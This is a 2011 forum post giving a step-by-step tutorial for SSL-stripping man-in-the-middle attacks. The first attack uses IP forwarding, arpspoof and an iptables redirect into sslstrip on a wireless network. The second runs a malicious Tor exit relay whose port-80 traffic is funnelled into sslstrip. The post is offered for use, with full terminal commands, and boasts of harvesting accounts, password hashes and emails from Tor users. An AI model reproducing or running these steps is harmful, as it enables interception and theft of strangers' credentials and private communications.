me.mello Posted June 18, 2011 Report Posted June 18, 2011 (edited) Author: Juan J. FernandezSecure Socket Layer is not secured as we might think. At least, throughout http and https. Vulnerabilities are presented through the exchange of data across http ? https and http ? https . These are exploited using https stripping attacks, transparently hijacking http traffic on a network, watching for https links and redirects to map those links into look-alike http links.SSLSTRIP tool do just exactly that and can be deployed through man in the middle attack on a wireless network using iptables, arpspoof. It can also be deployed on the Tor Network if you configure your computer as a relay exit node in port 80.REQUIREMENTI assume you are using a GNU/LINUX OS or Mac OSXSSLSTRIP: main tool for our stripping attack IPTABLE : to match our target traffic and redirect it to sslstrip ARPSPOOF: used in wireless network to make our computer look like routerTor as relay: to apply the concept once we enter another networkWireless https striping attackAs root, type in the terminal: echo “1” > /proc/sus/net/ipv4/ip_forward and arpspoof -i <interface Ex: wlan0> <langatewayip ex: 192.168.1.1> . This will let or authorize your linux box to forward the packet and perform and arp injection to let every computer knows that your mac adress is the mac adress of the router, those forwarding all those packets to you.Now, open up another terminal as root and type iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080 This will set the filtering rule(firewall) as “alter packets as soon as they come destinated to port 80 redirecting them to port 8080”Now, on the same terminal as root, type sslstrip -l 8080 -w sslstrip.log and on another terminal type tail -f sslstrip.log . At this point, sslstrip will do the job and neither the server nor the client knows that you are hijacking http and watching for https links to redirect and map those links into similar http links or homograph-similar https links. The tail command is to watch the log file as it increases. Tor network https stripping attackA wireless network is like any other network. Why not apply that to another network like Tor Network ? It just requires minor modification to iptable command and the elimination of arpspoof use and of course, set up Tor as relay. Set up Tor relayTor is a network of relay, when a user uses tor, he or she pass along about three computers(relays) before they get to the final destination. I will show you how to be the exit node(last relay)We will be creating another account to apply the redirection for that uid (user id and not us) that will prevent the disconnection... Open up a terminal as root and type useradd toruser -u 111 -m and passwd toruser (use the password you like). Then logout from your account and login to toruser. Install Tor Tor: Linux/BSD/Unix Install InstructionsFor the purpose of this presentation, download the Tor Browser Bundle for GNU/Linux on Download Tor extract it tar xvfz file.tar.gz and cd to filedirectory run vidalia in filedirectory/App.Once it start running click setup relay and configure exit node to port 80 only. Make sure your router forward port 80, 9051, 9001 and 9030 to your local ip if you are behind the router's firewall. Once you test it and verify that it is reacheble form the outside by running it again, logout from toruser account and login back to your original account.Now the fun part starts...Sniff out that Tor network !!!Open a terminal and type su toruser and type the assined password.This is an important step to run the relay: Cd to tor-browser_en-US (in my case) file directory inside toruser account andrun tor ./App/tor -f /home/toruser/tor-browser_en-US/Data/Tor/torrcNow that everything is running, reachable from outside,open up another terminal and as root type: iptables -t nat -I OUTPUT -p tcp -m owner --uid-owner 111 --dport 80 -j DNAT --to-destination 127.0.0.1:8080 Everything that comes from toruser will be redirected to localport 8080. DNAT means that match if the original destination differs from the reply source. This make sense when the OUTPUT match.(these are iptables details that worth to know to see what is really happening...) Now type sslstrip -l 8080 -w logfile and on another terminal to watch the file as it grows, tail -f logfile . Let it run couple of hours and days and you will see accounts, md5 hash, email messages, hosting accounts and more.Next page is just a small part of what I recollected from Tor Network.References? DEFCON 17 ? SSLSTRIP Moxie Marlinspike >> software >> sslstrip? Tor Tor: Documentation? IPTABLES iptables(8) - Linux man pageHave fun reading >< Edited June 18, 2011 by me.mello Quote
